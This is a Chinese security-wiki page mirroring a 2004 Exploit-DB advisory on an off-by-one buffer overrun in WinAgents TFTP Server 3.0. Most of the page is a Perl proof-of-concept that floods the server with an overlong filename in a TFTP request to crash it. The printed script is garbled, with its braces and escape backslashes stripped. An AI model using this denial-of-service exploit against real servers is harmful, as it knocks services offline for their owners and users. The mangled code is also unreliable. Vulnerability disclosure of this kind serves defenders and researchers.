WinAgents TFTP Server 3.0 – Remote Buffer Overrun

WinAgents TFTP Server 3.0 – Remote Buffer Overrun

漏洞ID 1054492 漏洞类型
发布时间 2004-06-11 更新时间 2004-06-11
图片[1]-WinAgents TFTP Server 3.0 – Remote Buffer Overrun-安全小百科CVE编号 N/A
图片[2]-WinAgents TFTP Server 3.0 – Remote Buffer Overrun-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24195
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10526/info

WinAgents TFTP Server is reported prone to a remote off-by-one buffer overrun vulnerability. The issue is reported to exist due to a lack of sufficient boundary checks performed on filenames when a request is made for a file. A remote attacker may make a malicious request to the server for a filename of excessive length. This request will trigger the vulnerability. Immediate consequences of such an attack will reportedly result in a denial of service.

#!/usr/bin/perl
# 
# Remote D.O.S WinAgents TFTP Server ver 3.0 
# 
# Tftp.pl <Host>

use IO::Socket;

$Tftp_Port = "69";
$FileName = "A"x1000;
$Tftp_OP = "x00x01";
$Tftp_M  = "bin";
$Buf = $Tftp_OP . $Tftp_M . $FileName ;

if(!($ARGV[0]))
 
 print "nUsage: perl $0 <Host>n" ;
 
 exit;
 

print "nRemote D.O.S WinAgents TFTP Server ver 3.0 PoCnnn";


$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket Error ...n"
;
$ipaddr = inet_aton($ARGV[0]);
$portaddr = sockaddr_in($Tftp_Port, $ipaddr);
send($socket, $Buf, 0, $portaddr) == length($Buf) or die "Error : Can't send ...n";
print "Server : $ARGV[0] Is Down ... n";

相关推荐: Sambar Server File Disclosure Vulnerability

Sambar Server File Disclosure Vulnerability 漏洞ID 1100558 漏洞类型 Input Validation Error 发布时间 2003-03-27 更新时间 2003-03-27 CVE编号 N/A CNN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享